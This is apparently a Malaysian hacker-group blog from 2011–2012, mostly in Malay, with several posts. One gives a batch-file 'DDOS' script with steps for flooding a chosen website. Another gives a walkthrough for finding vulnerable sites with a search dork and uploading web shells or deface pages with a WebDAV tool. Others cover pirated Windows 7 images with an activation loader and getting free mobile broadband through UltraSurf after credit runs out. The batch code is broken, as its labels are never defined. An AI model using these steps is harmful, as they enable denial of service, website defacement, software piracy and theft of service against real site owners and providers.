Saturday 25 February 2012

DDOS with Batch files

Salam 1 Malaysia ..
kali ini MAXNAIEFz nak ajar korang mcm mana nak buat DoS tools.

mula2 anda buka notepad. :)
copy code dibawah ini dan paste kedalam notepad- :D

@echo off
mode 67,16
title DDOS Attack
color 0a
echo DDOS With Batch File
set /p x=Server-Target:
ping %x%
@ping.exe -n 5 -w 1000 > nul
goto Next
set /p m=ip Host:
set /p n=Packet Size:
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS 

okey.. then tekan Save As..

save dgn nama DDOS.bat 
tukar Text Documents (*.txt) kepada All Files (*.*)

ok..smua dah selesai.. kemudian korang cuba buka files tersebut.. :D
pada ruangan Server-Target:
masukkan url website yang anda ingin serang..
contoh: then korang tkn Enter :)
ia akan keluar IP address website tersebut..

Pada ip Host: masukkan IP yg keluar td..

pada Packet Size: anda hanya letak.. 100000 dan tekan enter.
setelah enter ditekan.. dengan segera ianya akan menyerang website tersebut. :D

Sekian.... harap dpt mebantu korang smua.. huhu

Webdav :Rootkit By Hmei7:

Salam 1 Malaysia...

Anda kenal Webdav??
Webdav ialah satu tools utk meng upload shell/defacement dgn lebih mudah..
tools ini utk budak2 .. hahaha
untuk pengetahuan anda
Webdav ini menggunakan
exploit Webfolder
Webfolder ni Hanya terdapat Pada
Server Windows 2003

MaxNaIefz nak ajar cara menggunakan webdav yg terdapat dlm rootkit, diperbuat oleh Hmei7

Download Webdav Here              
Password: cbf

utk mencari site yg boleh diserang menggunakan webdav, anda hanya pergi ke dan tulis "Hmei7 inurl:indonesia.txt" dan keluar bnyak website.. pilih mana satu. cth: buang /indonesia.txt ..dan ia akan menjadi > < site itu boleh di deface menggunakan webdav..

balik ke webdav shell maker, klik setting.
tulisan "/Hmei7.asp;.txt" ganti dengan html/txt kamu punya. contoh: MAXNAIEFZ.html

pada bahagian "write your shell here" korang ganti semua gune Script korang sendiri la.... jika tidak punya script ambil disini Here.. huhu..pndai2 la korang edit aku punye script..
kemudian, klik "add site"

korang copy paste url target tadi dan klik ok.

klik serang!!
tunggu sampai ada tulisan "shell created !!"

okey.. smua dh selesai..  langsung lihat don.

Tuesday 20 December 2011

Window 7 Installation Files

Windows 7 Home Premium x86 SP1 (bootable)
Windows 7 Home Premium x64 SP1 (bootable)

Windows 7 Professional x86 SP1 (bootable)
Windows 7 Professional x64 SP1 (bootable)

Windows 7 Ultimate x86 SP1 (bootable)
Windows 7 Ultimate x64 SP1 (bootable)

p/s:pkai windows loader utk activate.. 

Credit to: Max Na Iefz

Monday 12 December 2011



ak mau ucpkn Selamat Tinggal Smua...
ak sdh tdk jd seorang hacker lg..
ak mau cuci tgn..
ak serahkn group ini kpda NoEntry Phc.. 
NoEntry suke hati ko la nk bg spe jd admin..
sape2 sila pm ak.. ak nk bg radio cmd | site cmd | page cmd
Group kami budak 1997 ..ak srah kepada Noentry jugak..
Ak akn prgi ..mgkin x akn kmbali lg.....

terima kasih kerana bnyak mmbimbing ak..

| International Cyber Pirate | RileksCrew | myHex Crew | Phantom Crew | DF-ARMY | Penggodam Cyber Malaysia | D3xt0p Cr3w | Cat-Devilcode | FrozenCrew | Mr.kuYariakI | DragonForce | Putih Cr3w | Malaysian Hacker Federation (Hacktivist) | Putera-Army | ஜ۩۩ஜ NOOB COMMUNITY ஜ۩۞۩ஜ|GilerSiberCrew | H4z4rDz H4cKeR Cr3wzx From Malaysia ²º¹º-²º¹² | Macho Cyb3rSec | Group Cyber Stealthy Army (CSA) | =XH4CK3RX= CR3W™ | Malaysia young cyber army | Malaysian Underground Army #2 (hacked by rilekscrew) | DF-MONSTER | ♒✕♓4℃Ḱ3ℛẌ♒ ☾ґ℮ẘ™ | WE ARE HACKER FROM MALAYSIA | WE ARE PROGRAMMER FROM MALAYSIA |

Saturday 10 December 2011

Format Laptop/PC using CMD

*USB Flash Drive (Minimum 4GB)
*Windows 7 or Vista installation files.
Follow the below steps to create bootable Windows 7/Vista USB drive using which you can install Windows 7/Vista easily.

1. Plug-in your USB flash drive to USB port and move all the contents from USB drive to a safe location on your system.

2. Open Command Prompt with admin rights. Use any of the below methods to open Command Prompt with admin rights.

*Type cmd in Start menu search box and hit Ctrl+ Shift+ Enter.

*Go to Start menu > All programs > Accessories, right click on Command Prompt and select Run as administrator.

3. You need to know about the USB drive a little bit. Type in the following commands in the command prompt:

First type DISKPART and hit enter to see the below message.

Next type LIST DISK command and note down the Disk number (ex: Disk 1) of your USB flash drive. In the below screenshot my Flash Drive Disk no is Disk 1.

4. Next type all the below commands one by one. Here I assume that your disk drive no is “Disk 1”.If you have Disk 2 as your USB flash drive then use Disk 2.Refer the above step to confirm it.
So below are the commands you need to type and execute one by one:



FORMAT FS=NTFS(Format process may take few seconds)



Don’t close the command prompt as we need to execute one more command at the next step. Just minimize it.

5. Next insert your Windows7/Vista DVD into the optical drive and check the drive letter of the DVD drive. In this guide I will assume that your DVD drive letter is “D” and USB drive letter is “H” (open my computer to know about it).

6. Maximize the minimized Command Prompt in the 4th step.Type the following command now:

D: CD BOOT and hit enter.Where “D” is your DVD drive letter.

CD BOOT and hit enter to see the below message.
7. Type another command given below to update the USB drive with BOOTMGR compatible code.


Where “H” is your USB drive letter. Once you enter the above command you will see the below message.

8. Copy your Windows 7/Vista DVD contents to the USB flash drive.
9. Your USB drive is ready to boot and install Windows 7/Vista. Only thing you need to change the boot priority at the BIOS to USB from the HDD or CD ROM drive. I won’t explain it as it’s just the matter the changing the boot priority or enabling the USB boot option in the BIOS.

Credits To:
| International Cyber Pirate | We Are Hacker From Malaysia | Frozen Crew | D3xtop Cr3w | Cat-devilcode | DragonForce | Putera Army | Rilekscrew | DF-Army | Newbievilcode | myHex crew | Secret Army | H3x0r cr3w | CmD CrewS | Phantom Crew |

Gune Broadband Secara Percuma

Assalamualaikum.. Kami disini ini kongsi kepada anda bagaimana untuk guna broadband secara percuma.. sila bace kat bawah ni>>

1. download ultrasurf software kat sini :

2. open file download tu --> pilih option --> untick "Start IE automically at start" -->turun bwh nyer pulak n amik Proxy Setting pastu tick Direct Use Ultra Surf PASTU EXIT,

3. Pastu pergi browser option --> connection --> proxy setting. GUNA manual proxy dan pastikan ia ' ' port : 9666.

4. Connect 3G modem cekom --> korang mesti boleh connect walaupun da kene barred @ kredit abes. tapi time tu takley surf je @ die ade ckp YOU HAVE UNSUFFICIENT BALANCE mende ntah bla3 tapi lau kowang da set MANUAL PROXY tadi die tak kuar 5. CONNECT BB anda dan open ultrasurf.... tggu smpi ultrasurf ckp "SUCCESSFULLY CONNECTED TO SERVER"time tu korang da ley surf

5. CONNECT BB anda dan open ultrasurf.... tggu smpi ultrasurf ckp "SUCCESSFULLY CONNECTED TO SERVER"time tu korang da ley surf

Kalau ade MASALAH lagi, sila ikot care2 altenatif lain spt dibawah :>

1. Dalam ultrasurf --> Option --> Proxy Setting --> Manual Proxy Setting.

2. Dalam proxy Host pule isikan "" dan Proxy port pula "8080"

Electricity Lightning